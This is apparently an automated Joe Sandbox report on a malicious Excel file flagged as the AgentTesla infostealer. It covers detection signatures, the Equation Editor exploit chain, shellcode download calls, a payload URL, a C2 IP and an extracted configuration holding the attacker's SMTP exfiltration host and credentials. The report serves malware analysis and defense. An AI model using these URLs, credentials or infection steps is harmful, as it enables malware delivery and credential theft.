Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TR-AHYO-12-13-2024.xlam.xlsx

Overview

General Information

Sample name:TR-AHYO-12-13-2024.xlam.xlsx
Analysis ID:1574864
MD5:a278c0370e95b81fed05f5f16cd482c0
SHA1:af710a7cba9e1770a71b70889d8930d516241586
SHA256:f5eeb56fa4c609e146563f5f7a9798f34845455f039245b95fa9e436e453ed96
Tags:xlamxlsxuser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3196 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3412 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • fryvcftyii.exe (PID: 3552 cmdline: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe MD5: EF05B0557B2C8F0C951A1B21B812E75F)
        • RegSvcs.exe (PID: 3560 cmdline: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.worlorderbillions.top", "Username": "niggabown22jan2024@worlorderbillions.top", "Password": "3^?r?mtxk(kt               "}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x679c:$s1: <legacyDrawing r:id="
  • 0x67c4:$s2: <oleObject progId="
  • 0x6805:$s3: autoLoad="true"

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
      • 0x334fb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
      • 0x3356d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
      • 0x335f7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
      • 0x33689:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
      • 0x336f3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
      • 0x33765:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
      • 0x337fb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
      • 0x3388b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
      00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Click to see the 5 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          6.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            6.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              6.2.RegSvcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
              • 0x334fb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
              • 0x3356d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
              • 0x335f7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
              • 0x33689:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
              • 0x336f3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
              • 0x33765:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
              • 0x337fb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
              • 0x3388b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
              5.2.fryvcftyii.exe.180000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                5.2.fryvcftyii.exe.180000.0.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  Click to see the 4 entries

                  Sigma Signatures

                  Exploits

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internet
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 190.90.160.170, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3412, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                  Sigma detected: File Dropped By EQNEDT32EXE
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3412, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe

                  System Summary

                  barindex
                  Sigma detected: Equation Editor Network Connection
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3412, Protocol: tcp, SourceIp: 190.90.160.170, SourceIsIpv6: false, SourcePort: 80
                  Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                  Source: Process startedAuthor: Jason Lynch: Data: Command: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, CommandLine: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3412, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, ProcessId: 3552, ProcessName: fryvcftyii.exe
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, CommandLine: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3412, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, ProcessId: 3552, ProcessName: fryvcftyii.exe
                  Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, CommandLine: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, ParentImage: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, ParentProcessId: 3552, ParentProcessName: fryvcftyii.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, ProcessId: 3560, ProcessName: RegSvcs.exe
                  Sigma detected: Modification of IE Registry Settings
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3412, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: TR-AHYO-12-13-2024.xlam.xlsxAvira: detected
                  Antivirus detection for URL or domain
                  Source: http://aquafusion.com.co/ngbx/ngown.exeAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.worlorderbillions.top", "Username": "niggabown22jan2024@worlorderbillions.top", "Password": "3^?r?mtxk(kt "}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exeReversingLabs: Detection: 73%
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeReversingLabs: Detection: 73%
                  Multi AV Scanner detection for submitted file
                  Source: TR-AHYO-12-13-2024.xlam.xlsxReversingLabs: Detection: 63%
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeJoe Sandbox ML: detected

                  Exploits

                  barindex
                  Office equation editor establishes network connection
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 190.90.160.170 Port: 80Jump to behavior
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: wntdll.pdb source: fryvcftyii.exe, 00000005.00000003.476364985.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, fryvcftyii.exe, 00000005.00000003.476210575.0000000002A60000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_0042445A
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042C6D1 FindFirstFileW,FindClose,5_2_0042C6D1
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_0042C75C
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_0042EF95
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_0042F0F2
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_0042F3F3
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_004237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_004237EF
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00423B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00423B12
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_0042BCBC

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Shellcode detected
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A057D URLDownloadToFileW,2_2_036A057D
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A05C8 WinExec,ExitProcess,2_2_036A05C8
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A0502 LoadLibraryW,URLDownloadToFileW,2_2_036A0502
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A05E8 ExitProcess,2_2_036A05E8
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A046C URLDownloadToFileW,2_2_036A046C
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A0488 URLDownloadToFileW,2_2_036A0488
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A051C URLDownloadToFileW,2_2_036A051C
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A0453 ExitProcess,2_2_036A0453
                  Source: global trafficDNS query: name: aquafusion.com.co
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
